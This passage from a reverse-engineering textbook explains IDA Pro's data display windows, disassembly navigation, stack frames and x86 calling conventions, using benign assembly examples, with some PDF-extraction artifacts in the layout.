data definitions. Using this option allows IDA to (1) see strings that may

be embedded in the code portion of a binary and have been mistakenly

converted into instructions or (2) to see strings within data that may be

formatted as something other than a string (such as an array of bytes or

integers). This option will also lead to the generation of many junk strings,

which are sequences that happen to consist of five or more ASCII charac-

ters whether or not they are legible. The effect of using this option is

similar to using the strings command with the -a switch.

Figure 5-8 demonstrates that IDA does not necessarily show all strings

within a binary if the strings setup is not configured properly. In this case,

Ignore instructions/data definitions has not been selected.

72 Chapter 5

Figure 5-8: Example of undetected string data

The result is that the string at location .rdata:0040C19C (“Please guess a num-

ber between 1 and %d.”) remains undetected. The moral here is to make

sure that you are looking for all of the types of strings you expect to

encounter in all of the places you might find them.

The Names Window

The Names window, shown in Figure 5-9, provides a summary listing of all

of the global names within a binary. A name is nothing more than a symbolic

description given to a program virtual address. IDA initially derives the list of

names from symbol-table and signature analysis during the initial loading of

a file. Names can be sorted alphabetically or in virtual address order (either

ascending or descending). The Names window is useful for rapidly navigating

to known locations within a program listing. Double-clicking any Names

window entry will immediately jump the disassembly view to display the

selected name.

Figure 5-9: The Names window

IDA Data Displays 73

Displayed names are both color and letter coded. The coding scheme is

summarized below:

As you browse through disassemblies, you will notice that there are many

named locations for which no name is listed in the Names window. In the

process of disassembling a program, IDA generates names for all locations

that are referenced directly either as code (a branch or call target) or as data

(read, written, or address taken). If a location is named in the program’s

symbol table, IDA adopts the name from the symbol table. If no symbol table

entry is available for a given program location, IDA generates a default name

for use in the disassembly. When IDA chooses to name a location, the virtual

address of the location is combined with a prefix that indicates what type of

location is being named. Incorporating the virtual address into a generated

name ensures that all generated names will be unique, as no two locations

can share the same virtual address. Autogenerated names of this type are not

displayed in the Names window. Some of the more common prefixes used

for autogenerated names include these:

FA regular function. These are functions that IDA does not recog-

nize as library functions.

LA library function. IDA recognizes library functions through the

use of signature-matching algorithms. If a signature does not exist

for a given library function, the function will be labeled as a regu-

lar function instead.

IAn imported name, most commonly a function name imported

from a shared library. The difference between this and a library

function is that no code is present for an imported name, while

the body of a library function will be present in the disassembly.

CNamed code. These are named program instruction locations

that IDA does not consider to be part of any function. This is pos-

sible when IDA finds a name in a program’s symbol table but

never sees a call to the corresponding program location.

DData. Named data locations typically represent global variables.

AString data. This is a referenced data location containing a se-

quence of characters that conform to one of IDA’s known string

data types, such as a null-terminated ASCII C string.

sub_xxxxxx A subroutine at address xxxxxx

loc_xxxxxx An instruction location at address xxxxxx

byte_xxxxxx 8-bit data at location xxxxxx

word_xxxxxx 16-bit data at location xxxxxx

dword_xxxxxx 32-bit data at location xxxxxx

unk_xxxxxx Data of unknown size at location xxxxxx

74 Chapter 5

Throughout the course of the book we will show additional algorithms

that IDA applies in choosing names for program data locations.

The Segments Window

The Segments window displays a summary listing of the segments present in

the binary file. Note that what IDA terms segments are most often called sections

when discussing the structure of binary files. Do not confuse the use of the

term segments in this manner with the memory segments associated with CPUs

that implement a segmented memory architecture. Information presented

in the window includes the segment name, start and end addresses, and

permission flags. The start and end addresses represent the virtual address

range to which the program sections will be mapped at runtime. The following

listing is an example of Segments window content from a Windows binary:

Name Start End R W X D L Align Base Type Class AD es ss ds fs gs

UPX0 00401000 00407000 R W X . L para 0001 public CODE 32 0000 0000 0001 FFFFFFFF FFFFFFFF

UPX1 00407000 00408000 R W X . L para 0002 public CODE 32 0000 0000 0001 FFFFFFFF FFFFFFFF

UPX2 00408000 0040803C R W . . L para 0003 public DATA 32 0000 0000 0001 FFFFFFFF FFFFFFFF

.idata 0040803C 00408050 R W . . L para 0003 public XTRN 32 0000 0000 0001 FFFFFFFF FFFFFFFF

UPX2 00408050 00409000 R W . . L para 0003 public DATA 32 0000 0000 0001 FFFFFFFF FFFFFFFF

In this case, we might quickly suspect that something is funny with this

particular binary since it uses nonstandard segment names and has two exe-

cutable segments that are writable, thus indicating the possibility of self-

modifying code (more on this in Chapter 21). The fact that IDA knows the

size of a segment does not indicate that IDA knows the contents of the seg-

ment. For a variety of reasons, segments often occupy less space on disk than

they do in memory. In such cases, IDA displays values for the portions of the

segment that IDA has determined it could fill from the disk file. For the

remainder of the segment, IDA displays question marks.

Double-clicking any entry in the window jumps the disassembly view to

the start of the selected segment. Right-clicking an entry provides a context

menu from which you can add new segments, delete existing segments, or

edit the properties of existing segments. These features are particularly useful

when reverse engineering files with nonstandard formats, as the binary’s

segment structure may not have been detected by the IDA loader.

Command-line counterparts to the Segments window include objdump (-h),

readelf (-S), and dumpbin (/HEADERS).

The Signatures Window

IDA makes use of an extensive library of signatures for identifying known

blocks of code. Signatures are used to identify common compiler-generated

startup sequences in an attempt to determine the compiler that may have

been used to build a given binary. Signatures are also used to categorize

functions as known library functions inserted by a compiler or as functions

added to the binary as a result of static linking. When IDA identifies library

IDA Data Displays 75

functions for you, you can focus more of your effort on the code that IDA did

not recognize (which is probably far more interesting to you than reverse

engineering the inner workings of printf).

The Signatures window is used to list the signatures that IDA has already

matched against the open binary file. An example from a Windows PE file is

shown here:

File State #func Library name

vc32rtf Applied 501 Microsoft VisualC 2-8/net runtime

This example indicates that IDA has applied the vc32rtf signatures

(from <IDADIR>/sigs) against the binary and, in doing so, has been able to

recognize 501 functions as library functions. That’s 501 functions that you

will not need to reverse engineer!

In at least two cases, you will want to know how to apply additional sig-

natures against your binaries. In the first case, IDA may fail to recognize the

compiler that was used to build a binary, with a resulting inability to select

appropriate signatures to apply. In this case, you may wish to force IDA to

apply one or more signatures that your preliminary analysis has led you to

believe IDA should try. The second situation involves creating your own sig-

natures for libraries that may not have existing signatures included with IDA.

An example might be the creation of signatures for the static version of the

OpenSSL libraries that ship with FreeBSD 8.0. DataRescue makes a toolkit

available for generating custom signatures that can be used by IDA’s signa-

ture-matching engine. We’ll cover the generation of custom signatures in

Chapter 12. Regardless of why you want to apply new signatures, either press-

ing the INSERT key or right-clicking the Signatures window will offer you the

Apply new signature option, at which time you can choose from a list of all

signatures known to your installation of IDA.

The Type Libraries Window

Similar in concept to the Signatures window is the Type Libraries window. Type

libraries represent IDA’s accumulated knowledge of predefined datatypes

and function prototypes gleaned from header files included with most pop-

ular compilers. By processing header files, IDA understands the datatypes

that are expected by common library functions and can annotate your disas-

semblies accordingly. Similarly, from these header files IDA understands

both the size and layout of complex data structures. All of this type informa-

tion is collected into TIL files (<IDADIR>/til) and applied any time a binary

is analyzed. As with signatures, IDA must first be able to deduce the libraries

that a program uses before it can select an appropriate set of TIL files to

load. You can request that IDA load additional type libraries by pressing the

INSERT key or by right-clicking within the Type Libraries window and choosing

Load type library. Type libraries are covered in more detail in Chapter 13.

76 Chapter 5

The Function Calls Window

In any program, a function can both call and be called by other functions. In

fact, it is a fairly simple task to construct a graph that displays the relation-

ships between callers and callees. Such a graph is called a function call graph

or function call tree (we will demonstrate how to have IDA generate such graphs

in Chapter 9). On occasion, we may not be interested in seeing the entire

call graph of a program; instead, we may be interested only in knowing the

immediate neighbors of a given function. For our purposes, we will call Y a

neighbor of X if Y directly calls X or X directly calls Y.

The Function Calls window provides the answer to this neighbor question.

When you open the Function Calls window, IDA determines the neighbors of

the function in which the cursor is positioned and generates a display such as

that shown in Figure 5-10.

Figure 5-10: The Function Calls window

In this example, we see that the function named sub_40182C is called from

six different locations in _main and _main in turn makes 15 other function

calls. Double-clicking any line within the Function Calls window immediately

jumps the disassembly window to the selected calling or called function (or

caller and callee). IDA cross-references (xrefs) are the mechanisms that

underlie the generation of the Function Calls windows. Xrefs will be covered

in more detail in Chapter 9.

The Problems Window

The Problems window is IDA’s way of informing you of any difficulties that it

has encountered in disassembling a binary and how it has chosen to deal

with those difficulties. In some instances, you may be able to manipulate the

disassembly to help IDA overcome a problem, and in other instances you

may not. You can expect to encounter problems in even the simplest of

IDA Data Displays 77

binaries. In many cases, simply choosing to ignore the problems is not a bad

strategy. In order to correct many of the problems, you need to have a better

understanding of the binary than IDA has, which for most of us is probably

not going to happen. A sample set of problems follows:

Address Type Instruction

.text:0040104C BOUNDS call eax

.text:004010B0 BOUNDS call eax

.text:00401108 BOUNDS call eax

.text:00401350 BOUNDS call dword ptr [eax]

.text:004012A0 DECISION push ebp

.text:004012D0 DECISION push ebp

.text:00401560 DECISION jmp ds:__set_app_type

.text:004015F8 DECISION dd 0FFFFFFFFh

.text:004015FC DECISION dd 0

Each problem is characterized by (1) the address at which the problem

occurs, (2) the type of problem encountered, and (3) the instruction present

at the problem location. In this example, we see a BOUNDS problem and a

DECISION problem. A BOUNDS problem occurs when the destination of a call

or jump either can’t be determined (as in this example, since the value of eax

is unknown to IDA) or appears to lie outside the range of virtual addresses in

a program. A DECISION problem is most often not a problem at all. A DECISION

usually represents an address at which IDA has chosen to disassemble bytes

as instructions rather than data even though the address has never been

referenced during the recursive descent instruction traversal (see Chapter 1).

A complete list of problem types and suggestions for how to deal with them is

available in the built-in IDA help file (see topic Problems List).

Summary

At first glance, the number of displays that IDA offers can seem overwhelm-

ing. You may find it easiest to stick with the primary displays until you are

comfortable enough to begin exploring the additional display offerings. In

any case, you should certainly not feel obligated to use everything that IDA

throws at you. Not every window will be useful in every reverse engineering

scenario.

In addition to the windows covered in this chapter, you will be confronted

by a tremendous number of dialogs as you endeavor to master IDA. We will

introduce key dialogs as they become relevant in the remainder of the book.

Finally, other than the default disassembly view graph, we have elected not to

cover graphs in this chapter. The IDA menu system distinguishes graphs as a

separate category of display from the subviews discussed in this chapter. We

will cover the reasons behind this in Chapter 9, which deals exclusively with

graphs.

At this point, you should be starting to get comfortable with the IDA user

interface. In the next chapter, we begin to focus on the many ways that you

can manipulate a disassembly to enhance your understanding of its behavior

and to generally make your life easier with IDA.

JMP

EBP

SUB

DISASSEMBLY NAVIGATION

In this and the following chapter we cover

the heart of what puts the Interactive in

IDA Pro, which is, in a nutshell, ease of navi-

gation and ease of manipulation. The focus of

this chapter is navigation; specifically, we show how IDA

facilitates moving around a disassembly in a logical

manner. So far, we have shown that at a basic level IDA simply combines

the features of many common reverse engineering tools into an integrated

disassembly display. Navigating around the display is one of the essential

skills required in order to master IDA. Static disassembly listings offer no

inherent navigational capability other than scrolling up and down the listing.

Even with the best text editors, such dead listings are very difficult to navigate,

as the best they have to offer is generally nothing more than an integrated,

grep-style search. As you shall see, IDA’s database underpinnings provide for

exceptional navigational features.

80 Chapter 6

Basic IDA Navigation

In your initial experience with IDA, you may be happy to make use of nothing

more than the navigational features that IDA has to offer. In addition to

offering fairly standard search features that you are accustomed to from your

use of text editors or word processors, IDA develops and displays a comprehen-

sive list of cross-references that behave in a manner similar to hyperlinks on

a web page. The end result is that, in most cases, navigating to locations of

interest requires nothing more than a double-click.

Double-Click Navigation

When a program is disassembled, every location in the program is assigned

a virtual address. As a result, we can navigate anywhere within a program by

providing the virtual address of the location we are interested in visiting.

Unfortunately for us, maintaining a catalog of addresses in our head is not a

trivial task. This fact motivated early programmers to assign symbolic names

to program locations that they wished to reference, making things a whole

lot easier on themselves. The assignment of symbolic names to program

addresses was not unlike the assignment of mnemonic instruction names to

program opcodes; programs became easier to read and write by making them

easier to remember.

As we discussed previously, IDA generates symbolic names during the

analysis phase by examining a binary’s symbol table or by automatically gen-

erating a name based on how a location is referenced within the binary. In

addition to its symbolic purpose, any name displayed in the disassembly

window is a potential navigation target similar to a hyperlink on a web page.

The two differences between these names and standard hyperlinks are (1)

that the names are never highlighted in any way to indicate that they can be

followed and (2) that IDA requires a double-click to follow rather than the sin-

gle-click required by a hyperlink. We have already seen the use of names in

various subwindows such as the Functions, Imports, and Exports windows.

Recall that for each of these windows, double-clicking a name caused the dis-

assembly view to jump to the referenced location. This is one example of the

double-click navigation at work. In the following listing, each of the symbols

labeled X represents a named navigational target. Double-clicking any of

them will cause IDA to relocate the display to the selected location.

.text:0040132B loc_40132B: ; CODE XREF: Ysub_4012E4+B^j

.text:0040132B cmp edx, 0CDh

.text:00401331 jg short Xloc_40134E

.text:00401333 jz Xloc_4013BF

.text:00401339 sub edx, 0Ah

.text:0040133C jz short Xloc_4013A7

.text:0040133E sub edx, 0C1h

.text:00401344 jz short Xloc_4013AF

.text:00401346 dec edx

.text:00401347 jz short Xloc_4013B7

.text:00401349 jmp Xloc_4013DD ; default

.text:00401349 ; jumptable 00401300 case 0

Disassembly Navigation 81

.text:0040134E ; ----------------------------------------------------------

.text:0040134E

.text:0040134E loc_40134E: ; CODE XREF: Ysub_4012E4+4D^j

For navigational purposes, IDA treats two additional display entities as nav-

igational targets. First, cross-references (shown at Y here) are treated as

navigational targets. Cross-references are generally formated as a name and a

hex offset. The cross-reference at the right of loc_40134E in the previous listing

refers to a location that is 4D16 or 7710 bytes beyond the start of sub_4012E4.

Double-clicking the cross-reference text will jump the display to the referen-

cing location (00401331 in this case). Cross-references are covered in more

detail in Chapter 9.

The second type of display entity afforded special treatment in a naviga-

tional sense is one that uses hexadecimal values. If a displayed hexadecimal

value represents a valid virtual address within the binary, then double-clicking

the value will reposition the disassembly window to display the selected virtual

address. In the listing that follows, double-clicking any of the values indicated

by Z will jump the display, because each is a valid virtual address within the

given binary, while double-clicking any of the values indicated by [ will have

no effect.

.data:00409013 db [4

.data:00409014 dd Z4037B0h

.data:00409018 db [0

.data:00409019 db [0Ah

.data:0040901A dd Z404590h

.data:0040901E db [0

.data:0040901F db [0Ah

.data:00409020 dd Z404DA8h

A final note about double-click navigation concerns the IDA Output

window, which is most often used to display informational messages. When

a navigational target, as previously described, appears as the first item in a

message, double-clicking the message will jump the display to the indicated

target.

Propagating type information...

Function argument information has been propagated

The initial autoanalysis has been finished.

\ 40134e is an interesting location

] Testing: 40134e

\ loc_4013B7

] Testing: loc_4013B7

In the Output window excerpt just shown, the two messages indicated

by \ can be used to navigate to the addresses indicated at the start of the

respective messages. Double-clicking any of the other messages, including

those at ], will result in no action at all.

82 Chapter 6

Jump to Address

Occasionally, you will know exactly what address you would like to navigate to,

yet no name will be handy in the disassembly window to offer simple double-

click navigation. In such a case, you have a few options. The first, and most

primitive, option is to use the disassembly window scroll bar to scroll the

display up or down until the desired location comes into view. This is usually

feasible only when the location you are navigating to is known by its virtual

address, since the disassembly window is organized linearly by virtual address.

If all you know is a named location such as a subroutine named foobar, then

navigating via the scroll bar becomes something of a needle-in-a-haystack

search. At that point, you might choose to sort the Functions window alpha-

betically, scroll to the desired name, and double-click the name. A third option

is to use one of IDA’s search features available via the Search menu, which typ-

ically involves specifying some search criteria before asking IDA to perform a

search. In the case of searching for a known location, this is usually overkill.

Ultimately, the easiest way to get to a known disassembly location is to

make use of the Jump to Address dialog shown in Figure 6-1.

Figure 6-1: The Jump to Address dialog

The Jump to Address dialog is accessed via JumpJump to Address, or

by using the G hotkey while the disassembly window is active. Thinking of

this dialog as the Go dialog may help you remember the associated hotkey.

Navigating to any location in the binary is as simple as specifying the address

(a name or hex value will do) and clicking OK, which will immediately jump

the display to the desired location. Values entered into the dialog are remem-

bered and made available on subsequent use via a drop-down list. This history

feature makes returning to previously requested locations somewhat easier.

Navigation History

If we compare IDA’s document-navigation functions to those of a web browser,

we might equate names and addresses to hyperlinks, as each can be followed

relatively easily to view a new location. Another feature IDA shares with tradi-

tional web browsers is the concept of forward and backward navigation based

on the order in which you navigate the disassembly. Each time you navigate

to a new location within a disassembly, your current location is appended to

a history list. Two menu operations are available for traversing this list. First,

JumpJump to Previous Position repositions the disassembly to the most

recent entry in the history list. The behavior is conceptually identical to a

web browser’s back button. The associated hotkey is ESC, and it is one of the

most useful hotkeys that you can commit to memory. Be forewarned, how-

ever, that using ESC when any window other than the disassembly window is

Disassembly Navigation 83

active causes the active window to be closed. (You can always reopen windows

that you closed accidentally via ViewOpen Subviews.) Backward navigation

is extremely handy when you have followed a chain of function calls several

levels deep and you decide that you want to navigate back to your original

position within the disassembly.

JumpJump to Next Position is the counterpart operation that moves

the disassembly window forward in the history list in a manner similar to a

web browser’s forward button. For the sake of completeness, the associated

hotkey for this operation is CTRL-ENTER, though it tends to be less useful than

using ESC for backward navigation.

Stack Frames

Because IDA Pro is such a low-level analysis tool, many of its features and

displays expect the user to be somewhat familiar with the low-level details

of compiled languages, many of which center on the specifics of generating

machine language and managing the memory used by a high-level program.

Therefore, from time to time this book covers some of the theory of compiled

programs in order to make sense of the related IDA displays.

One such low-level concept is that of the stack frame. Stack frames are

blocks of memory allocated within a program’s runtime stack and dedicated

to a specific invocation of a function. Programmers typically group executable

statements into units called functions (also called procedures, subroutines, or

methods). In some cases this may be a requirement of the language being used.

In most cases it is considered good programming practice to build programs

from such functional units.

When a function is not executing, it typically requires little to no memory.

When a function is called, however, it may require memory for several reasons.

First, the caller of a function may wish to pass information into the function

in the form of parameters (arguments), and these parameters need to be

stored somewhere the function can find them. Second, the function may

need temporary storage space while performing its task. This temporary

space is often allocated by a programmer through the declaration of local

variables, which can be used within the function but cannot be accessed

once the function has completed.

Compilers utilize stack frames (also called activation records) to make the

allocation and deallocation of function parameters and local variables trans-

parent to the programmer. A compiler inserts code to place a function’s

parameters into the stack frame prior to transferring control to the function

itself, at which point the compiler inserts code to allocate enough memory to

Finally, two of the more useful toolbar but-

tons, shown in Figure 6-2, provide the familiar

browser-style forward and backward behavior.

Each of the buttons is associated with a drop-

down history list that offers you instant access

to any location in the navigation history without

having to trace your steps through the entire list.

Figure 6-2: Forward

and backward navi-

gation buttons

84 Chapter 6

hold the function’s local variables. As a consequence of the way stack frames

are constructed, the address to which the function should return is also

stored within the new stack frame. A pleasant result of the use of stack

frames is that recursion becomes possible, as each recursive call to a function

is given its own stack frame, neatly segregating each call from its predecessor.

The following steps detail the operations that take place when a function is

called:

1. The caller places any parameters required by the function being called

into locations as dictated by the calling convention (see “Calling Con-

ventions” on page 85) employed by the called function. This operation

may result in a change to the program stack pointer if parameters are

placed on the runtime stack.

2. The caller transfers control to the function being called. This is usually

performed with an instruction such as the x86 CALL or the MIPS JAL. A

return address is typically saved onto the program stack or in a CPU

3. If necessary, the called function takes steps to configure a frame pointer1

and saves any register values that the caller expects to remain unchanged.

4. The called function allocates space for any local variables that it may

require. This is often done by adjusting the program stack pointer to

reserve space on the runtime stack.

5. The called function performs its operations, potentially generating a

result. In the course of performing its operations, the called function

may access the parameters passed to it by the calling function. If the func-

tion returns a result, the result is often placed into a specific register or

registers that the caller can examine once the function returns.

6. Once the function has completed its operations, any stack space reserved

for local variables is released. This is often done by reversing the actions

performed in step 4.

7. Any registers whose values were saved (in step 3) on behalf of the caller

are restored to their original values. This includes the restoration of the

caller’s frame pointer register.

8. The called function returns control to the caller. Typical instructions for

this include the x86 RET and the MIPS JR instructions. Depending on the

calling convention in use, this operation may also serve to clear one or

more parameters from the program stack.

9. Once the caller regains control, it may need to remove parameters from

the program stack. In such cases a stack adjustment may be required to

restore the program stack pointer to the value that it held prior to step 1.

1. A frame pointer is a register that points to a location inside a stack frame. Variables within the

stack frame are typically referenced by their relative distance from the location to which the frame

pointer points.

Disassembly Navigation 85

Steps 3 and 4 are so commonly performed upon entry to a function that

together they are called the function’s prologue. Similarly, steps 6 through 8

are so frequently performed at the end of a function that together they make

up the function’s epilogue. With the exception of step 5, which represents the

body of the function, all of these operations constitute the overhead associated

with calling a function.

Calling Conventions

With a basic understanding of what stack frames are, we can take a closer

look at exactly how they are structured. The examples that follow reference

the x86 architecture and the behavior associated with common x86 compilers

such as Microsoft Visual C/C++ or GNU’s gcc/g++. One of the most important

steps in the creation of a stack frame involves the placement of function

parameters onto the stack by the calling function. The calling function must

store parameters exactly as the function being called expects to find them;

otherwise, serious problems can arise. Functions advertise the manner in

which they expect to receive their arguments by selecting and adhering to a

specific calling convention.

A calling convention dictates exactly where a caller should place any

parameters that a function requires. Calling conventions may require param-

eters to be placed in specific registers, on the program stack, or in both reg-

isters and on the stack. Equally important to when parameters are passed

on the program stack is determining who is responsible for removing them

from the stack once the called function has completed. Some calling con-

ventions dictate that the caller is responsible for removing parameters that it

placed on the stack, while other calling conventions dictate that the called

function will take care of removing the parameters from the stack. Adherence

to publicized calling conventions is essential in maintaining the integrity of

the program stack pointer.

The C Calling Convention

The default calling convention used by most C compilers for the x86 arch-

itecture is called the C calling convention. The _cdecl modifier may be used by

C/C++ programs to force compilers to utilize the C calling convention when

the default calling convention may have been overridden. We will refer to

this calling convention as the cdecl calling convention from here on. The

cdecl calling convention specifies that the caller place parameters to a function

on the stack in right-to-left order and that the caller (as opposed to the callee)

remove the parameters from the stack after the called function completes.

One result of placing parameters on the stack in right-to-left order is that

the leftmost (first) parameter of the function will always be on the top of the

stack when the function is called. This makes the first parameter easy to find

regardless of the number of parameters the function expects, and it makes

the cdecl calling convention ideally suited for use with functions that can take

a variable number of arguments (such as printf).

86 Chapter 6

Requiring the calling function to remove parameters from the stack

means that you will often see instructions that make an adjustment to the

program stack pointer immediately following the return from a called func-

tion. In the case of functions that can accept a variable number of arguments,

the caller is ideally suited to make this adjustment, as the caller knows exactly

how many arguments it has chosen to pass to the function and can easily make

the correct adjustment, whereas the called function never knows ahead of

time how many parameters it may receive and would have a difficult time

making the necessary stack adjustment.

In the following examples we consider calls to a function having the fol-

lowing prototype:

void demo_cdecl(int w, int x, int y, int z);

By default, this function will use the cdecl calling convention, expecting

the four parameters to be pushed in right-to-left order and requiring the

caller to clean the parameters off the stack. A compiler might generate code

for a call to this function as follows:

; demo_cdecl(1, 2, 3, 4); //programmer calls demo_cdecl

X push 4 ; push parameter z

push 3 ; push parameter y

push 2 ; push parameter x

push 1 ; push parameter w

call demo_cdecl ; call the function

Y add esp, 16 ; adjust esp to its former value

The four push operations beginning at X result in a net change to the

program stack pointer (ESP) of 16 bytes (4 * sizeof(int) on a 32-bit arch-

itecture), which is undone at Y following the return from demo_cdecl. If

demo_cdecl is called 50 times, each call will be followed by an adjustment

similar to that at Y. The following example also adheres to the cdecl calling

convention while eliminating the need for the caller to explicitly clean

parameters off the stack following each call to demo_cdecl.

; demo_cdecl(1, 2, 3, 4); //programmer calls demo_cdecl

mov [esp+12], 4 ; move parameter z to fourth position on stack

mov [esp+8], 3 ; move parameter y to third position on stack

mov [esp+4], 2 ; move parameter x to second position on stack

mov [esp], 1 ; move parameter w to top of stack

call demo_cdecl ; call the function

In this example, the compiler has preallocated storage space for the

parameters to demo_cdecl at the top of the stack during the function prologue.

When the parameters for demo_cdecl are placed on the stack, there is no change

to the program stack pointer, which eliminates the need to adjust the stack

pointer when the call to demo_cdecl completes. The GNU compilers (gcc and

g++) utilize this technique to place function parameters onto the stack.

Disassembly Navigation 87

Note that either method results in the stack pointer pointing to the leftmost

argument when the function is called.

The Standard Calling Convention

Standard in this case is a bit of a misnomer as it is a name that Microsoft created

for its own calling convention marked by the use of the _stdcall modifier in a

function declaration, as shown here:

void _stdcall demo_stdcall(int w, int x, int y);

In order to avoid any confusion surrounding the word standard, we will

refer to this calling convention as the stdcall calling convention for the

remainder of the book.

As with the cdecl calling convention, stdcall requires that function param-

eters be placed on the program stack in right-to-left order. The difference

when using stdcall is that the called function is responsible for clearing the

function parameters from the stack when the function has finished. In order

for a function to do this, the function must know exactly how many parameters

are on the stack. This is possible only for functions that accept a fixed number

of parameters. As a result, variable argument functions such as printf cannot

make use of the stdcall calling convention. The demo_stdcall function, for

example, expects three integer parameters, occupying a total of 12 bytes on

the stack (3 * sizeof(int) on a 32-bit architecture). An x86 compiler can use

a special form of the RET instruction to simultaneously pop the return address

from the top of the stack and add 12 to the stack pointer to clear the function

parameters. In the case of demo_stdcall, we might see the following instruction

used to return to the caller:

ret 12 ; return and clear 12 bytes from the stack

The primary advantage to the use of stdcall is the elimination of code to

clean parameters off the stack following every function call, which results in

slightly smaller, slightly faster programs. By convention Microsoft utilizes the

stdcall convention for all fixed-argument functions exported from shared

library (DLL) files. This is an important point to remember if you are attempt-

ing to generate function prototypes or binary-compatible replacements for

any shared library components.

The fastcall Convention for x86

A variation on the stdcall convention, the fastcall calling convention passes

up to two parameters in CPU registers rather than on the program stack. The

Microsoft Visual C/C++ and GNU gcc/g++ (version 3.4 and later) compilers

recognize the fastcall modifier in function declarations. When fastcall is

specified, the first two parameters passed to a function will be placed in the

ECX and EDX registers, respectively. Any remaining parameters are placed

on the stack in right-to-left order similar to stdcall. Also similar to stdcall,

88 Chapter 6

fastcall functions are responsible for removing parameters from the stack

when they return to their caller. The following declaration demonstrates the

use of the fastcall modifier.

void fastcall demo_fastcall(int w, int x, int y, int z);

A compiler might generate the following code in order to call

demo_fastcall:

; demo_fastcall(1, 2, 3, 4); //programmer calls demo_fastcall

push 4 ; move parameter z to second position on stack

push 3 ; move parameter y to top position on stack

mov edx, 2 ; move parameter x to edx

mov ecx, 1 ; move parameter w to ecx

call demo_fastcall ; call the function

Note that no stack adjustment is required upon return from the call to

demo_fastcall, as demo_fastcall is responsible for clearing parameters y and z

from the stack as it returns to the caller. It is important to understand that

because two arguments are passed in registers, the called function needs to

clear only 8 bytes from the stack even though there are four arguments to the

function.

C++ Calling Conventions

Nonstatic member functions in C++ classes differ from standard functions in

that they must make available the this pointer, which points to the object used

to invoke the function. The address of the object used to invoke the function

must be supplied by the caller and is therefore provided as a parameter when

calling nonstatic member functions. The C++ language standard does not

specify how this should be passed to nonstatic member functions, so it should

come as no surprise that different compilers use different techniques when

passing this.

Microsoft Visual C++ offers the thiscall calling convention, which passes

this in the ECX register and requires the nonstatic member function to

clean parameters off the stack as in stdcall. The GNU g++ compiler treats

this as the implied first parameter to any nonstatic member function and

behaves in all other respects as if the cdecl convention is being used. Thus,

for g++-compiled code, this is placed on top of the stack prior to calling the

nonstatic member function, and the caller is responsible for removing param-

eters (there will always be at least one) from the stack once the function

returns. Additional features of compiled C++ are discussed in Chapter 8.

Other Calling Conventions

Complete coverage of every existing calling convention would require a

book in its own right. Calling conventions are often language-, compiler-,

and CPU-specific, and some research on your part may be required as you

encounter code generated by less-common compilers. A few situations

deserve special mention, however: optimized code, custom assembly lan-

guage code, and system calls.

Disassembly Navigation 89

When functions are exported for use by other programmers (such as

library functions), it is important that they adhere to well-known calling

conventions so that programmers can easily interface to those functions.

On the other hand, if a function is intended for internal program use only,

then the calling convention used by that function need be known only within

that function’s program. In such cases, optimizing compilers may choose to

use alternate calling conventions in order to generate faster code. Instances

in which this may occur include the use of the /GL option with Microsoft Visual

C++ and the use of the regparm keyword with GNU gcc/g++.

When programmers go to the trouble of using assembly language, they

gain complete control over how parameters will be passed to any functions

that they happen to create. Unless they wish to make their functions available

to other programmers, assembly language programmers are free to pass

parameters in any way they see fit. As a result, you may need to take extra

care when analyzing custom assembly code. Custom assembly code is often

encountered in obfuscation routines and shellcode.

A system call is a special type of function call used to request an operating

system service. System calls usually effect a state transition from user mode to

kernel mode in order for the operating system kernel to service the user’s

request. The manner in which system calls are initiated varies across operat-

ing systems and CPUs. For example, Linux x86 system calls may be initiated

using the int 0x80 instruction or the sysenter instruction, while other x86

operating systems may use only the sysenter instruction or alternate interrupt

numbers. On many x86 systems (Linux being an exception) parameters for

system calls are placed on the runtime stack, and a system call number is

placed in the EAX register immediately prior to initiating the system call.

Linux system calls accept their parameters in specific registers and occasion-

ally in memory when there are more parameters than available registers.

Local Variable Layout

Unlike the calling conventions that dictate the manner in which parameters

are passed into a function, there are no conventions that mandate the layout

of a function’s local variables. When compiling a function, one task a com-

piler is faced with is to compute the amount of space required by a function’s

local variables. Another task is to determine whether those variables can be

allocated in CPU registers or whether they must be allocated on the program

stack. The exact manner in which these allocations are made is irrelevant to

both the caller of a function and to any functions that may, in turn, be called.

Most notably, it is typically impossible to determine a function’s local variable

layout based on examination of the function’s source code.

Stack Frame Examples

Consider the following function compiled on a 32-bit x86-based computer:

void bar(int j, int k); // a function to call

void demo_stackframe(int a, int b, int c) {

int x;

90 Chapter 6

char buffer[64];

int y;

int z;

// body of function not terribly relevant other than

bar(z, y);

}

We compute the minimum amount of stack space required for local

variables as 76 bytes (three 4-byte integers and a 64-byte buffer). This function

could use either stdcall or cdecl, and the stack frame will look the same.

Figure 6-3 shows one possible implementation of a stack frame for an invoca-

tion of demo_stackframe, assuming that no frame pointer register is used (thus

the stack pointer, ESP, serves as the frame pointer). This frame would be set

up on entry to demo_stackframe with the one-line prologue:

sub esp, 76 ; allocate sufficient space for all local variables

The Offset column indicates the base+displacement address required to

reference any of the local variables or parameters in the stack frame.

Figure 6-3: An ESP-based stack frame

Generating functions that utilize the stack pointer to compute all variable

references requires a little more effort on the part of the compiler, as the

stack pointer changes frequently and the compiler must make sure that proper

offsets are used at all times when referencing any variables within the stack

frame. Consider the call made to bar in function demo_stackframe, the code

for which is shown here:

X push dword [esp+4] ; push y

Y push dword [esp+4] ; push z

call bar

add esp, 8 ; cdecl requires caller to clear parameters

Variable Offset

y [esp+4]

buffer [esp+8]

x [esp+72]

saved eip [esp+76]

a [esp+80]

b [esp+84]

c [esp+88]

esp z [esp]

local variables

parameters

Disassembly Navigation 91

The push at X correctly pushes local variable y per the offset in Figure 6-3.

At first glance it might appear that the push at Y incorrectly references local

variable y a second time. However, because we are dealing with an ESP-based

frame and the push at X modifies ESP, all of the offsets in Figure 6-3 must be

temporarily adjusted each time ESP changes. Following X, the new offset for

local variable z becomes [esp+4] as correctly referenced in the push at Y. When

examining functions that reference stack frame variables using the stack

pointer, you must be careful to note any changes to the stack pointer and

adjust all future variable offsets accordingly. One advantage of using the

stack pointer to reference all stack frame variables is that all other registers

remain available for other purposes.

Once demo_stackframe has completed, it needs to return to the caller.

Ultimately a ret instruction will be used to pop the desired return address

off the top of the stack into the instruction pointer register (EIP in this case).

Before the return address can be popped, the local variables need to be

removed from the top of the stack so that the stack pointer correctly points

to the saved return address when the ret instruction is executed. For this

particular function the resulting epilogue becomes

add esp, 76 ; adjust esp to point to the saved return address

ret ; return to the caller

At the expense of dedicating a register for use as a frame pointer and

some code to configure the frame pointer on entry to the function, the job

of computing local variable offsets can be made easier. In x86 programs, the

